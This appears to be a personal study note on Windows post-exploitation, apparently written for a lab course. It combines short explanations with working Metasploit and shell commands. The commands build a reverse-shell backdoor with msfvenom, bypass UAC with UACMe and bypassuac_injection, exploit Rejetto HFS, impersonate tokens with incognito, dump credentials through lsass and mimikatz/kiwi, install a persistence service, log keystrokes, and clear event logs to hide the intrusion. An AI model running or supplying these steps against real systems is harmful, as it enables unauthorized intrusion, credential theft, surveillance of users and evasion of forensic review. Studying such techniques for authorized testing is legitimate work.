Windows Post Exploitation

Windows Post Exploitation

Navigation

Sections in This Note


Bypassing UAC with UACMe

UAC (User Account Control) is a Windows security feature introduced in Windows Vista that is used to prevent unauthorized changes from being made to the operating system. UAC ensures that changes to the OS require approval from the administrator or a user account that is part of the local administrators group. Attackers can bypass UAC in order to execute malicious executables with elevated privileges.

In order to successfully bypass UAC, we need access to a user account that is part of the local administrators group on the Windows target system.

Tools:

Step 10: Generate a malicious executable using msfvenom and run it on the target machine to gain administrator user privileges.

Note: Replace "10.10.1.3" with your local IP address.

Commands:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.3 LPORT=4444 -f exe > 'backdoor.exe'
file 'backdoor.exe'

Step 11: Switch the directory to the user's temp folder and upload Akagi64.exe and backdoor.exe.

Commands:
CTRL + C
cd C:\Users\admin\AppData\Local\Temp
upload /root/Desktop/tools/UACME/Akagi64.exe .
upload /root/backdoor.exe .
ls

Start another msfconsole and run a multi handler:

Commands:
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.1.3
set LPORT 4444
exploit
meterpreter > migrate -N lsass.exe
[*] Migrating from 4132 to 768...
[*] Migration completed successfully.
meterpreter >

Switch back to the meterpreter and run the Akagi64.exe executable:

meterpreter > shell
Process 2928 created.
Channel 4 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\admin\AppData\Local\Temp>Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe
Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe

C:\Users\admin\AppData\Local\Temp>

Access Token Impersonation

Bypassing User Access Control (UAC)

UAC is a Windows security feature introduced in Windows Vista used to prevent unauthorized changes to the operating system, requiring approval from the administrator. We can use the "Windows Escalate UAC Protection Bypass (In Memory Injection)" module to bypass UAC by utilizing the trusted publisher certificate through process injection. It spawns a second shell with the UAC flag turned off.

service postgresql start
msfconsole
workspace -a windows_post
setg RHOSTS (IPaddress)
db_nmap -sV (IPaddress)

# (consider the target has rejetto vuln)
use exploit/windows/http/rejetto_hfs_exec
run

search bypassuac_injection
use exploit/windows/local/bypassuac_injection
set payload windows/x64/meterpreter/reverse_tcp
set session (session number)
run

Token Impersonation with Incognito

Windows Access Tokens

Windows access tokens are a core element of the authentication process on Windows, created and managed by LSASS. A Windows access token identifies and describes the security context of a process or thread. It can be thought of as a temporary key (akin to a web cookie) that provides users with access to a system/network resource without providing credentials each time a process starts. Access tokens are generated by winlogon.exe every time a user authenticates successfully, and include the identity and privileges of the associated user account. This token is attached to userinit.exe, and child processes started by the user inherit a copy of the access token and run under the same privileges.

Windows access tokens are categorized by security level:

Windows Privileges

The process of impersonating access tokens to elevate privileges depends on the privileges assigned to the compromised account, as well as the impersonation/delegation tokens available.

Privileges required for a successful impersonation attack:

The Incognito Module

Incognito is a built-in meterpreter module (originally a standalone application) that allows you to impersonate user tokens after successful exploitation. We can use it to display a list of available tokens that we can impersonate.

msfconsole -q
use exploit/windows/http/rejetto_hfs_exec
set RHOSTS 10.0.28.7
exploit

load incognito
list_tokens -u
impersonate_token ATTACKDEFENSE\\Administrator

Dumping Hashes with MimiKatz

Mimikatz is a Windows post-exploitation tool written by Benjamin Delpy (@gentilkiwi). It allows extraction of plaintext credentials from memory, password hashes from local SAM databases, and more. The SAM database is a database file on Windows systems that stores user passwords, used to authenticate users locally and remotely. We can use the pre-built mimikatz executable, or, if we have a meterpreter session, use the inbuilt meterpreter extension Kiwi, which allows us to dynamically execute Mimikatz on the target system without touching the disk.

meterpreter > migrate -N lsass.exe
[*] Migrating from 4132 to 768...
[*] Migration completed successfully.
meterpreter >

Load kiwi extension:

Command: load kiwi
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

Success.
meterpreter >

Establishing Persistence on Windows

Persistence consists of techniques adversaries use to keep access to systems across restarts, changed credentials, and other interruptions. Gaining an initial foothold isn't enough — you need to set up and maintain persistent access.

use exploit/windows/local/persistence_service
set payload windows/meterpreter/reverse_tcp
set SESSION 1
exploit

use multi/handler

Keylogging

Keylogging is the process of recording/capturing keystrokes entered on a target system. Not limited to post-exploitation — there are programs and USB devices for this too. Meterpreter on Windows provides the ability to capture keystrokes entered on a target system and download them back to our local system.

pgrep explorer
migrate 2312
keyscan_start
# (starts the keylogging)
keyscan_dump

Windows Event Logs

Windows stores and catalogs all actions/events performed on the system in the Windows Event Log. Categorized by type:

Event logs can be accessed via the Event Viewer, and are the first stop for any forensic investigator after a compromise. It's therefore very important to clear your tracks after finishing an assessment.

clearev
Powered by Forestry.md